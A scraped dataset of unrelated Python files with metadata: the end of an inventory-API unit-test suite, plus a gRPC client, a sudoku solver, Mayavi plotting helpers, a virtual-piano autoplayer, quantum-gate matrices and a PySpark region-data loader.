should raise a TypeError.\n \"\"\"\n with self.assertRaises(TypeError):\n from_auth_header([\"not\", \"a\", \"string\"])\n\n def test_invalid_value(self):\n \"\"\"\n Initializing the Identity object with an invalid Base6č encoded payload should\n raise a ValueError.\n \"\"\"\n with self.assertRaises(ValueError):\n from_auth_header(\"invalid Base64\")\n\n def test_invalid_format(self):\n \"\"\"\n Initializing the Identity object with an valid Base64 encoded payload\n that does not contain the \"identity\" field.\n \"\"\"\n identity = self._identity()\n\n dict_ = identity._asdict()\n json = dumps(dict_)\n base64 = b64encode(json.encode())\n\n with self.assertRaises(KeyError):\n from_auth_header(base64)\n\n\nclass AuthIdentityValidateTestCase(TestCase):\n def test_valid(self):\n try:\n identity = Identity(account_number=\"some number\")\n validate(identity)\n self.assertTrue(True)\n except ValueError:\n self.fail()\n\n def test_invalid(self):\n account_numbers = [None, \"\"]\n for account_number in account_numbers:\n with self.subTest(account_number=account_number):\n with self.assertRaises(ValueError):\n Identity(account_number=account_number)\n\n\nclass TrustedIdentityTestCase(TestCase):\n shared_secret = \"ImaSecret\"\n\n def _build_id(self):\n identity = from_bearer_token(self.shared_secret)\n return identity\n\n def test_validation(self):\n identity = self._build_id()\n\n with set_environment({SHARED_SECRET_ENV_VAR: self.shared_secret}):\n validate(identity)\n\n def test_validation_with_invalid_identity(self):\n identity = from_bearer_token(\"InvalidPassword\")\n\n with self.assertRaises(ValueError):\n validate(identity)\n\n def test_validation_env_var_not_set(self):\n identity = self._build_id()\n\n with set_environment({}):\n with self.assertRaises(ValueError):\n validate(identity)\n\n def test_validation_token_is_None(self):\n tokens = [None, \"\"]\n for token in tokens:\n with self.subTest(token_value=token):\n with self.assertRaises(ValueError):\n Identity(token=token)\n\n def test_is_trusted_system(self):\n identity = self._build_id()\n\n self.assertEqual(identity.is_trusted_system, True)\n\n def test_account_number_is_not_set_for_trusted_system(self):\n identity = self._build_id()\n\n self.assertEqual(identity.account_number, None)\n\n\nclass ConfigTestCase(TestCase):\n def test_configuration_with_env_vars(self):\n app_name = \"brontocrane\"\n path_prefix = \"r/slaterock/platform\"\n expected_base_url = f\"/{path_prefix}/{app_name}\"\n expected_api_path = f\"{expected_base_url}/v1\"\n expected_mgmt_url_path_prefix = \"/mgmt_testing\"\n\n new_env = {\n \"INVENTORY_DB_USER\": \"fredflintstone\",\n \"INVENTORY_DB_PASS\": \"bedrock1234\",\n \"INVENTORY_DB_HOST\": \"localhost\",\n \"INVENTORY_DB_NAME\": \"SlateRockAndGravel\",\n \"INVENTORY_DB_POOL_TIMEOUT\": \"3\",\n \"INVENTORY_DB_POOL_SIZE\": \"8\",\n \"APP_NAME\": app_name,\n \"PATH_PREFIX\": path_prefix,\n \"INVENTORY_MANAGEMENT_URL_PATH_PREFIX\": expected_mgmt_url_path_prefix,\n }\n\n with set_environment(new_env):\n\n conf = Config()\n\n self.assertEqual(conf.db_uri, \"postgresql://fredflintstone:bedrock1234@localhost/SlateRockAndGravel\")\n self.assertEqual(conf.db_pool_timeout, 3)\n self.assertEqual(conf.db_pool_size, 8)\n self.assertEqual(conf.api_url_path_prefix, expected_api_path)\n self.assertEqual(conf.mgmt_url_path_prefix, expected_mgmt_url_path_prefix)\n\n def test_config_default_settings(self):\n expected_api_path = \"/api/inventory/v1\"\n expected_mgmt_url_path_prefix = \"/\"\n\n # Make sure the environment variables are not set\n with set_environment(None):\n\n conf = Config()\n\n self.assertEqual(conf.db_uri, \"postgresql://insights:insights@localhost/insights\")\n self.assertEqual(conf.api_url_path_prefix, expected_api_path)\n self.assertEqual(conf.mgmt_url_path_prefix, expected_mgmt_url_path_prefix)\n self.assertEqual(conf.db_pool_timeout, 5)\n self.assertEqual(conf.db_pool_size, 5)\n\n def test_config_development_settings(self):\n with set_environment({\"INVENTORY_DB_POOL_TIMEOUT\": \"3\"}):\n\n conf = Config()\n\n self.assertEqual(conf.db_pool_timeout, 3)\n\n\nclass HostOrderHowTestCase(TestCase):\n def test_asc(self):\n column = Mock()\n result = _order_how(column, \"ASC\")\n self.assertEqual(result, column.asc())\n\n def test_desc(self):\n column = Mock()\n result = _order_how(column, \"DESC\")\n self.assertEqual(result, column.desc())\n\n def test_error(self):\n invalid_values = (None, \"asc\", \"desc\", \"BBQ\")\n for invalid_value in invalid_values:\n with self.subTest(order_how=invalid_value):\n with self.assertRaises(ValueError):\n _order_how(Mock(), invalid_value)\n\n\n@patch(\"api.host._order_how\")\n@patch(\"api.host.Host.modified_on\")\nclass HostParamsToOrderByTestCase(TestCase):\n def test_default_is_updated_desc(self, modified_on, order_how):\n actual = _params_to_order_by(None, None)\n expected = (modified_on.desc.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n def test_default_for_updated_is_desc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", None)\n expected = (modified_on.desc.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n def test_order_by_updated_asc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", \"ASC\")\n expected = (order_how.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(modified_on, \"ASC\")\n\n def test_order_by_updated_desc(self, modified_on, order_how):\n actual = _params_to_order_by(\"updated\", \"DESC\")\n expected = (order_how.return_value,)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(modified_on, \"DESC\")\n\n @patch(\"api.host.Host.display_name\")\n def test_default_for_display_name_is_asc(self, display_name, modified_on, order_how):\n actual = _params_to_order_by(\"display_name\")\n expected = (display_name.asc.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_not_called()\n\n @patch(\"api.host.Host.display_name\")\n def test_order_by_display_name_asc(self, display_name, modified_on, order_how):\n actual = _params_to_order_by(\"display_name\", \"ASC\")\n expected = (order_how.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(display_name, \"ASC\")\n\n @patch(\"api.host.Host.display_name\")\n def test_order_by_display_name_desc(self, display_name, modified_on, order_how):\n actual = _params_to_order_by(\"display_name\", \"DESC\")\n expected = (order_how.return_value, modified_on.desc.return_value)\n self.assertEqual(actual, expected)\n order_how.assert_called_once_with(display_name, \"DESC\")\n\n\nclass HostParamsToOrderByErrorsTestCase(TestCase):\n def test_order_by_bad_field_raises_error(self):\n with self.assertRaises(ValueError):\n _params_to_order_by(Mock(), \"fqdn\")\n\n def test_order_by_only_how_raises_error(self):\n with self.assertRaises(ValueError):\n _params_to_order_by(Mock(), order_how=\"ASC\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":11053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555349467","text":"import grpc\r\nimport hello_pb2\r\nimport hello_pb2_grpc\r\n\r\ndef run():\r\n with grpc.insecure_channel(\"localhost:50051\") as channel:\r\n stub = hello_pb2_grpc.GreeterStub(channel)\r\n response = stub.SayHello(hello_pb2.HelloRequest(name=\"kapil\"))\r\n print(response.message)\r\n\r\nif __name__ == \"__main__\":\r\n run()","sub_path":"hello_client.py","file_name":"hello_client.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"644033786","text":"from itertools import combinations\n\ndata = input().split()\nword = data[0]\nnum = int(data[1])\n\nfor i in range(1, num + 1):\n for j in combinations(sorted(word), i):\n print(''.join(j))\n\n","sub_path":"hackerrank/python/itertools/itertools_combinations.py","file_name":"itertools_combinations.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"530621108","text":"class Sudoku:\n\n def __init__(self, board):\n self.board = board\n\n def solve_sudoku(self):\n r, c = self.find_next_empty()\n if r is None:\n return True\n for guess in range(1, 10):\n if self.is_valid(guess, r, c):\n self.board[r][c] = guess\n if self.solve_sudoku():\n return True\n self.board[r][c] = 0\n return False\n\n def find_next_empty(self):\n # finds the next row, col that's not filled yet which is 0\n # return row, col tuple (or None, None) if there is none\n for r in range(9):\n for c in range(9):\n if self.board[r][c] == 0:\n return r, c\n return None, None\n\n def is_valid(self, guess, r, c):\n r_nums = self.board[r]\n if guess in r_nums:\n return False\n c_nums = []\n for i in range(9):\n c_nums.append(self.board[i][c])\n if guess in c_nums:\n return False\n r_start = (r // 3) * 3\n c_start = (c // 3) * 3\n for r in range(r_start, r_start + 3):\n for c in range(c_start, c_start + 3):\n if self.board[r][c] == guess:\n return False\n return True\n\n def __str__(self):\n board = \"\"\n for i in range(len(self.board)):\n for j in range(len(self.board[0])):\n board += \"|\" + str(self.board[i][j])\n board = board + \"|\\n\"\n return board\n\n def write_to_file(self, filename):\n file = open(filename, \"w\")\n file.write(self.__str__())\n file.close()\n\n\ndef main():\n board_1 = [[5, 3, 0, 0, 7, 0, 0, 0, 0],\n [6, 0, 0, 1, 9, 5, 0, 0, 0],\n [0, 9, 8, 0, 0, 0, 0, 6, 0],\n [8, 0, 0, 0, 6, 0, 0, 0, 3],\n [4, 0, 0, 8, 0, 3, 0, 0, 1],\n [7, 0, 0, 0, 2, 0, 0, 0, 6],\n [0, 6, 0, 0, 0, 0, 2, 8, 0],\n [0, 0, 0, 4, 1, 9, 0, 0, 5],\n [0, 0, 0, 0, 8, 0, 0, 7, 9]]\n\n sudoku = Sudoku(board_1)\n sudoku.solve_sudoku()\n print(sudoku)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"607319830","text":"import numpy as np\nfrom numpy import pi, cos, sin, abs\nfrom mayavi import mlab\nfrom tvtk.tools import visual\nfrom tvtk.api import tvtk\nfrom tvtk.common import configure_input_data\n\n\nfrom PyMieSim.Tools.utils import Sp2Cart\n\nCMAP = 'jet'\nRED = (1,0,0)\nBLUE = (0,0,1)\nYELLOW = (1,1,0)\nWHITE = (1,1,1)\n\ndef ArrowAB(x1, y1, z1, x2, y2, z2, Scale=1):\n\n ar1 = visual.arrow(x = x1,\n y = y1,\n z = z1)\n ar1.length_cone = 0.2*Scale\n arrow_length = np.sqrt((x2-x1)**2+(y2-y1)**2+(z2-z1)**2)\n ar1.actor.scale = [arrow_length*Scale, arrow_length*Scale, arrow_length*Scale]\n ar1.pos = ar1.pos/arrow_length\n ar1.axis = [x2-x1, y2-y1, z2-z1]\n\n\ndef ArrowAVec(Origin,\n Vec,\n Scale = 0.5,\n Color = WHITE,\n ScaleTube = 1.0):\n\n Vec = np.asarray(Vec)\n\n ar1 = visual.arrow(x = Origin[0],\n y = Origin[1],\n z = Origin[2],\n color = Color)\n\n ar1.length_cone = min( 1, 0.35/Scale*ScaleTube )\n\n ar1.actor.scale = np.array([1, 1, 1])*Scale\n\n ar1.radius_shaft = 0.02/Scale*ScaleTube\n\n ar1.radius_cone = 2.5* ar1.radius_shaft\n\n ar1.pos = np.asarray(Origin)/Scale\n\n ar1.axis = Vec\n\n\n\ndef PlotCone(Figure,\n Radius = 1.,\n Origin = (0,0,0),\n Resolution = 10,\n Height = 1.,\n Direction = (0,0,1)):\n\n cone = tvtk.ConeSource(center = Origin,\n radius = Radius,\n resolution = Resolution,\n height = Height,\n direction = Direction)\n\n configure_input_data( tvtk.PolyDataMapper(), cone.output )\n\n cone.update()\n\n p = tvtk.Property(opacity=0.8, color=RED)\n\n actor = tvtk.Actor(mapper=mapper, property=p)\n\n Figure.scene.add_actor(actor)\n\n\ndef ElectricFieldArrow(Figure, Origin, Pol, Scale=0.5):\n Vec = [sin(Pol),cos(Pol),0]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = RED)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'E',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = RED)\n\ndef WavenumberArrow(Figure, Origin, Scale=0.5):\n Vec = [0,0,1]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = YELLOW)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'k',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = YELLOW)\n\n\ndef MagneticFieldArrow(Figure, Origin, Pol, Scale=0.5):\n Vec = [cos(Pol),-sin(Pol),0]\n\n ArrowAVec(Origin = Origin,\n Vec = Vec,\n Scale = Scale,\n Color = BLUE)\n\n mlab.text3d(x = Vec[0]+Origin[0],\n y = Vec[1]+Origin[1],\n z = Vec[2]+Origin[2],\n text = 'B',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25,\n color = BLUE)\n\n\ndef AddSource(Figure, Origin, Polarization, Scale=0.5):\n ElectricFieldArrow(Figure, Origin, Polarization, Scale=Scale)\n MagneticFieldArrow(Figure, Origin, Polarization, Scale=Scale)\n WavenumberArrow(Figure, Origin, Scale=Scale)\n\n\ndef AddUnitSphere(Num, Radius, Origin, Figure):\n\n Coord = list( UnitSphere(Num=50, Radius=Radius) )\n\n Coord[0] += Origin[0]\n Coord[1] += Origin[1]\n Coord[2] += Origin[2]\n\n mlab.mesh(*Coord, colormap='gray', opacity=0.5, figure=Figure)\n\n\ndef AddUnitAxes(Figure,\n Scale = 1.,\n Origin = (0,0,0),\n Label = True,\n ScaleTube = 1.0):\n\n mlab.points3d(0, 0, 0, opacity=0.01, scale_factor=0.01, figure=Figure)\n\n ArrowAVec(Origin, (0, 0, 1), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0],\n y = Origin[1],\n z = Origin[2]+Scale,\n text = 'Z',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25)\n\n ArrowAVec(Origin, (0, 1, 0), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0],\n y = Origin[1]+Scale,\n z = Origin[2],\n text = 'Y',\n line_width = 0.1,\n figure = Figure,\n scale = 0.25)\n\n ArrowAVec(Origin, (1, 0, 0), Scale=Scale, ScaleTube=ScaleTube)\n if Label: mlab.text3d(x = Origin[0]+Scale,\n y = Origin[1],\n z = Origin[2],\n text = 'X',\n line_width = 0.01,\n figure = Figure,\n scale = 0.25)\n\n\ndef UnitSphere(Num, Radius=1.):\n phi, theta = np.mgrid[-pi/2:pi/2:complex(Num), -pi:pi:complex(Num)]\n\n return Sp2Cart(phi*0+Radius, phi, theta)\n\n\ndef implicit_plot(expr,\n ext_grid,\n fig_handle = None,\n Nx = 101,\n Ny = 101,\n Nz = 101,\n col_isurf = (50/255, 199/255, 152/255),\n col_osurf = (240/255, 36/255, 87/255),\n opa_val = 0.8,\n opaque = True,\n ori_axis = True,\n **kwargs):\n \"\"\"Function to plot algebraic surfaces described by implicit equations in Mayavi\n\n Implicit functions are functions of the form\n\n `F(x,y,z) = c`\n\n where `c` is an arbitrary constant.\n\n Parameters\n ----------\n expr : string\n The expression `F(x,y,z) - c`; e.g. to plot a unit sphere, the `expr` will be `x**2 + y**2 + z**2 - 1`\n ext_grid : 6-tuple\n Tuple denoting the range of `x`, `y` and `z` for grid; it has the form - (xmin, xmax, ymin, ymax, zmin, zmax)\n fig_handle : figure handle (optional)\n If a mayavi figure object is passed, then the surface shall be added to the scene in the given figure. Then, it is the responsibility of the calling function to call mlab.show().\n Nx, Ny, Nz : Integers (optional, preferably odd integers)\n Number of points along each axis. It is recommended to use odd numbers to ensure the calculation of the function at the origin.\n col_isurf : 3-tuple (optional)\n color of inner surface, when double-layered surface is used. This is also the specified color for single-layered surface.\n col_osurf : 3-tuple (optional)\n color of outer surface\n opa_val : float (optional)\n Opacity value (alpha) to use for surface\n opaque : boolean (optional)\n Flag to specify whether the surface should be opaque or not\n ori_axis : boolean\n Flag to specify whether a central axis to draw or not\n\n \"\"\"\n if fig_handle==None: # create a new figure\n fig = mlab.figure(1,bgcolor=(0.97, 0.97, 0.97), fgcolor=(0, 0, 0), size=(800, 800))\n else:\n fig = fig_handle\n xl, xr, yl, yr, zl, zr = ext_grid\n x, y, z = np.mgrid[xl:xr:eval('{}j'.format(Nx)),\n yl:yr:eval('{}j'.format(Ny)),\n zl:zr:eval('{}j'.format(Nz))]\n scalars = eval(expr)\n src = mlab.pipeline.scalar_field(x, y, z, scalars)\n if opaque:\n delta = 1.e-5\n opa_val=1.0\n else:\n delta = 0.0\n #col_isurf = col_osurf\n # In order to render different colors to the two sides of the algebraic surface,\n # the function plots two contour3d surfaces at a "distance" of delta from the value\n # of the solution.\n # the second surface (contour3d) is only drawn if the algebraic surface is specified\n # to be opaque.\n cont1 = mlab.pipeline.iso_surface(src, color=col_isurf, contours=[0-delta],\n transparent=False, opacity=opa_val)\n cont1.compute_normals = False # for some reasons, setting this to true actually cause\n # more unevenness on the surface, instead of more smooth\n if opaque: # the outer surface is specular, the inner surface is not\n cont2 = mlab.pipeline.iso_surface(src, color=col_osurf, contours=[0+delta],\n transparent=False, opacity=opa_val)\n cont2.compute_normals = False\n cont1.actor.property.backface_culling = True\n cont2.actor.property.frontface_culling = True\n cont2.actor.property.specular = 0.2 #0.4 #0.8\n cont2.actor.property.specular_power = 55.0 #15.0\n else: # make the surface (the only surface) specular\n cont1.actor.property.specular = 0.2 #0.4 #0.8\n cont1.actor.property.specular_power = 55.0 #15.0\n\n # Scene lights (4 lights are used)\n engine = mlab.get_engine()\n scene = engine.current_scene\n cam_light_azimuth = [78, -57, 0, 0]\n cam_light_elevation = [8, 8, 40, -60]\n cam_light_intensity = [0.72, 0.48, 0.60, 0.20]\n \"\"\"\n for i in range(4):\n camlight = scene.scene.light_manager.lights[i]\n camlight.activate = True\n camlight.azimuth = cam_light_azimuth[i]\n camlight.elevation = cam_light_elevation[i]\n camlight.intensity = cam_light_intensity[i].\n \"\"\"\n # axis through the origin\n if ori_axis:\n len_caxis = int(1.05*np.max(np.abs(np.array(ext_grid))))\n caxis = mlab.points3d(0.0, 0.0, 0.0, len_caxis, mode='axes',color=(0.15,0.15,0.15),\n line_width=1.0, scale_factor=1.,opacity=1.0)\n caxis.actor.property.lighting = False\n # if no figure is passed, the function will create a figure.\n if fig_handle==None:\n # Setting camera\n cam = fig.scene.camera\n cam.elevation(-20)\n cam.zoom(1.0) # zoom should always be in the end.\n mlab.show()\n\n\n# -\n","sub_path":"PyMieSim/Tools/PlotsUtils.py","file_name":"PlotsUtils.py","file_ext":"py","file_size_in_byte":10557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323968784","text":"# nombre / anomalo/ ini / fin\n\n\n\n\n\nclass normal():\n def __init__(self, nombre, tipo):\n self.name = nombre\n self.type = tipo\n\n\nclass section():\n def __init__(self, inicio, duracion):\n self.inicio = inicio\n self.duracion = duracion\n\n\nclass anomalous(normal):\n def __init__(self, nombre, tipo, listaTramosAnomalos=[], listaTramosNoUtiles=[]):\n normal.__init__(self, nombre, tipo)\n self.tramosAnomalos = listaTramosAnomalos\n self.tramos_no_usar = listaTramosNoUtiles\n\n\ndef leer(src_normal, src_anomalous):\n lista1, lista2 = [], []\n arch1 = open(src_normal, 'r')\n for line in arch1:\n line = line[:-1]\n v_n = normal(line, 0)\n lista1.append(v_n)\n arch1.close()\n arch2 = open(src_anomalous, 'r')\n for line in arch2:\n linea = line.split('/')\n #print(linea)\n v_n = anomalous(linea[0], 1)\n\n linea_no_usar = linea[1].split(\" \")\n tramosNoUsar = []\n #print(linea_no_usar)\n i = 0\n while i < len(linea_no_usar)-1:\n tramosNoUsar.append(\n section(linea_no_usar[i], linea_no_usar[i+1]))\n i += 2\n v_n.tramos_no_usar = tramosNoUsar\n\n linea_anomalos = linea[2].split(\" \")\n #print(linea_anomalos)\n tramosAnomalos = []\n i = 0\n while i < len(linea_anomalos)-1:\n tramosAnomalos.append(\n section(linea_anomalos[i], linea_anomalos[i+1]))\n i += 2\n v_n.tramosAnomalos = tramosAnomalos\n lista2.append(v_n)\n arch1.close()\n return lista1, lista2\n\n\n#l1, l2 = leer(rt.n_tr_data_txt, rt.a_tr_data_txt)\n\n\"\"\" for i in l2:\n print(i.name, i.type, end=\" \")\n print(\"-\", end=\"\")\n for t in i.tramos_no_usar:\n print(t.inicio, t.duracion, end=\" \")\n print(\"-\", end=\"\")\n for t in i.tramosAnomalos:\n print(t.inicio, t.duracion, end=\" \")\n print(\"\")\nprint(rt.a_tr_data_txt) \"\"\"\n","sub_path":"Python Files/Crime Detection/resnet/leertxt.py","file_name":"leertxt.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357437589","text":"# -*- coding: utf-8 -*-\n\nfrom pyautogui import * # Use to interact with I/O keyboard \nimport webbrowser # Use to lauchn VirtualPiano on a web browser\nimport json # Use to interact with a song.json\n\n# [NEED TO FIX SOMETHING HERE] --> Need to ask at user what song need to be play\nfor songs in json.load(open(\"./songs.json\")):\n song = songs.pop('Curb_Your_Enthusiasm')\n\n # [NEED TO FIX SOMETHING HERE] --> Need to recover the good delay in depend of variable song'\n delay = ...\n\n# This dictionary convert keymusic in keyboard using by Virtual Piano\nkeys = {'c1': '1', 'C1': '!', 'd1': '2', 'D1': '@', 'e1': '3', 'f1': '4', 'F1': '$', 'g1': '5', 'G1': '%', 'a1': '6', 'A1': '^', 'b1': '7', # First Octave \n 'c2': '8', 'C2': '*', 'd2': '9', 'D2': '(', 'e2': '0', 'f2': 'q', 'F2': 'Q', 'g2': 'w', 'G2': 'W', 'a2': 'e', 'A2': 'E', 'b2': 'r', # Second Octave\n 'c3': 't', 'C3': 'T', 'd3': 'y', 'D3': 'Y', 'e3': 'u', 'f3': 'i', 'F3': 'I', 'g3': 'o', 'G3': 'O', 'a3': 'p', 'A3': 'P', 'b3': 'a', # Third Octave\n 'c4': 's', 'C4': 'S', 'd4': 'd', 'D4': 'D', 'e4': 'f', 'f4': 'g', 'F4': 'G', 'g4': 'h', 'G4': 'H', 'a4': 'j', 'A4': 'J', 'b4': 'k', # Fourth Octave\n 'c5': 'l', 'C5': 'L', 'd5': 'z', 'D5': 'W', 'e5': 'x', 'f5': 'c', 'F5': 'C', 'g5': 'v', 'G5': 'V', 'a5': 'b', 'A5': 'B', 'b5': 'n', # Fifth Octave\n 'c6': 'm', '-': '-'} # Sixth Octave + '-' term use to the time.sleep\n\n# The specific website use to play piano with keyboard --> Make sure tto switch your keyboard in ENG format\npiano_url = 'https://virtualpiano.net'\n\n\ndef play_song():\n \"\"\" This function is use to press key on the website and play the song with each note in song\n\n Parameters\n ----------\n ??? maybe use song later to play song ask by user with function input ???\n\n Version\n -------\n Specification : Lionel Loncin (v.1 06/18/2019)\n Implementation : Lionel Loncin (v.1 06/17/2019)\n Lucas Maes (v.1.1 06/17/2019)\"\"\"\n\n for letter in song_converter(song):\n\n if letter == '-':\n time.sleep(0.02)\n press(letter)\n\n\ndef song_converter(song):\n \"\"\" This function return a new string which separate each note and time.sleep\n\n Parameter\n -----------\n song : string of all notes in a song (str)\n\n Version\n -------\n Specification : Lionel Loncin (v.1 06/18/2019)\n Implementation : Lucas Maes (v.1 06/17/2019) \"\"\"\n\n pattern = ''\n new_song = ''\n for letters in song:\n if letters == '-':\n print(pattern)\n if pattern != '':\n new_song += keys[pattern]\n pattern = ''\n new_song += '-'\n else:\n if len(pattern) > 0 and pattern[-1] in '0123456789':\n new_song += keys[pattern]\n pattern = ''\n pattern += letters\n\n return new_song\n\n\ndef main():\n webbrowser.open_new(piano_url)\n time.sleep(7)\n play_song()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n","sub_path":"python_piano.py","file_name":"python_piano.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101004219","text":"import numpy as np\r\nimport math\r\nfrom math import e\r\n\r\ndef rx(theta, qubit, total):\r\n rx=np.array([[math.cos(theta/2), -1J*math.sin(theta/2)],\r\n [1J*math.sin(theta/2),math.cos(theta/2)]])\r\n rx=np.kron(np.identity(2**qubit),rx)\r\n rx=np.kron(rx,np.identity(2**(total-qubit-1)))\r\n return rx\r\n\r\n\r\ndef ry(theta, qubit, total):\r\n ry=np.array([[math.cos(theta/2), -1*math.sin(theta/2)],\r\n [math.sin(theta/2),math.cos(theta/2)]])\r\n ry=np.kron(np.identity(2**qubit),ry)\r\n ry=np.kron(ry,np.identity(2**(total-qubit-1)))\r\n return ry \r\n\r\ndef cnot(ctrl, target, total):\r\n if ctrl < target:\r\n cnot = np.array([[1,0,0,0],[0,1,0,0],[0,0,0,1],[0,0,1,0]])\r\n \r\n if target < ctrl:\r\n cnot = np.array([[0,1,0,0],[1,0,0,0],[0,0,1,0],[0,0,0,1]])\r\n for k in range(min(ctrl,target)):\r\n cnot=np.kron(np.identity(2),cnot)\r\n for k in range(total-max(ctrl,target)-1):\r\n cnot=np.kron(cnot,np.identity(2))\r\n return cnot\r\n\r\ndef swap(q1, q2, total):\r\n swap= np.array([[1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])\r\n\r\n for k in range(min(q1,q2)):\r\n swap=np.kron(np.identity(2),swap)\r\n for k in range(total-max(q1,q2)-1):\r\n swap=np.kron(swap,np.identity(2))\r\n return swap\r\n\r\ndef two_Q(theta1, theta2, q1, direction, total):\r\n \"\"\"Theta1 is on the higher one\"\"\"\r\n \"\"\"Q1 is the higher one\"\"\"\r\n \"\"\" higher one literally means above in circuit diagram\"\"\"\r\n \r\n r1 = ry(theta1,q1,total)\r\n r2 = ry(theta2,q1+1,total)\r\n two_Q = np.matmul(r1,r2)\r\n \r\n if direction == 'down':\r\n c1 = cnot(q1,q1+1,total)\r\n c2 = cnot(q1+1,q1,total)\r\n if direction == 'up':\r\n c1 = cnot(q1+1,q1,total)\r\n c2 = cnot(q1,q1+1,total)\r\n \r\n two_Q = np.matmul(c1,two_Q)\r\n \r\n two_Q = np.matmul(c2, two_Q)\r\n return two_Q\r\n\r\ndef rz(phi,qubit,total):\r\n rz=np.array([[1, 0],[0,e**(1j*phi)]])\r\n rz=np.kron(np.identity(2**qubit),rz)\r\n rz=np.kron(rz,np.identity(2**(total-qubit-1)))\r\n return rz \r\n \r\ndef three_Q(theta1, theta2, theta3, theta4, theta5, theta6, q1, total):\r\n r1= ry(theta1,q1,total)\r\n r2 = ry(theta2,q1+1,total)\r\n r3 = ry(theta3,q1+2,total)\r\n r = np.matmul(r1,r2)\r\n r = np.matmul(r,r3)\r\n \r\n c = cnot(q1,q1+1,total)\r\n \r\n three_Q = np.matmul(c,r)\r\n \r\n c = ry(theta4, q1+1, total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n c = cnot(q1+1, q1+2, total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n c = swap(q1+1, q1+2,total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n r1 = ry(theta5,q1,total)\r\n r2 = ry(theta6,q1+1,total)\r\n r = np.matmul(r1, r2)\r\n \r\n \r\n three_Q = np.matmul(r, three_Q)\r\n \r\n c = cnot(q1,q1+1,total)\r\n \r\n three_Q = np.matmul(c,r)\r\n \r\n c = swap(q1+1,q1+2,total)\r\n \r\n three_Q = np.matmul(c, three_Q) \r\n \r\n return three_Q\r\n\r\ndef two_Q_2(theta1, theta2, q1, q2, total):\r\n \r\n \"\"\"theta 1 acts on q1 \"\"\" \r\n\r\n r1 = ry(theta1,q1,total)\r\n r2 = ry(theta2,q2,total)\r\n two_Q_2 = np.matmul(r1,r2)\r\n k = 0\r\n while abs(q1-q2)>1:\r\n\r\n two_Q_2 = np.matmul(two_Q_2,swap(q1, q1+(np.sign(q2-q1)*+1), total))\r\n \r\n q2 = q1+(np.sign(q2-q1)*+1)\r\n k = k+1\r\n \r\n c1 = cnot(q1,q2,total)\r\n \r\n two_Q_2 = np.matmul(c1, two_Q_2)\r\n\r\n for i in range(k):\r\n two_Q_2 = np.matmul(two_Q_2,swap(q1, q1-(np.sign(q2-q1)*-1), total))\r\n q2 = q1-(np.sign(q2-q1)*-1)\r\n \r\n return two_Q_2\r\n\r\n\r\n","sub_path":"my_gates.py","file_name":"my_gates.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"338731106","text":"from . import inputFormatClass, keyFormatClass, valueFormatClass, conf\nimport logging\nfrom glob import glob\nimport pyspark\n\n\"\"\"\n Loading functions for region data\n\"\"\"\n# global logger\nlogger = logging.getLogger('gmql_logger')\n\n\ndef put_in_dictionary(tuple):\n tuple[1]['id_sample'] = tuple[0]\n return tuple[1]\n\n\ndef load_reg_from_path(path, parser):\n\n # we need to take only the files of the regions, so only the files that does NOT end with '.meta'\n all_files = set(glob(pathname=path + '/*'))\n meta_files = set(glob(pathname=path + '/*.meta'))\n\n only_region_files = all_files - meta_files\n only_region_files = ','.join(only_region_files)\n\n conf_meta = conf.copy()\n conf_meta[\"mapred.input.dir\"] = only_region_files\n sc = pyspark.SparkContext.getOrCreate()\n\n logger.info(\"loading region data\")\n files = sc.newAPIHadoopRDD(inputFormatClass,\n keyFormatClass,\n valueFormatClass,\n conf=conf_meta) # files = RDD(id, string)\n logger.info(\"parsing region data\")\n files = files.map(lambda x: parser.parse_line_reg(id_record=x[0], line=x[1])) # files = RDD(id, dict)\n\n return files, parser.get_attributes() # 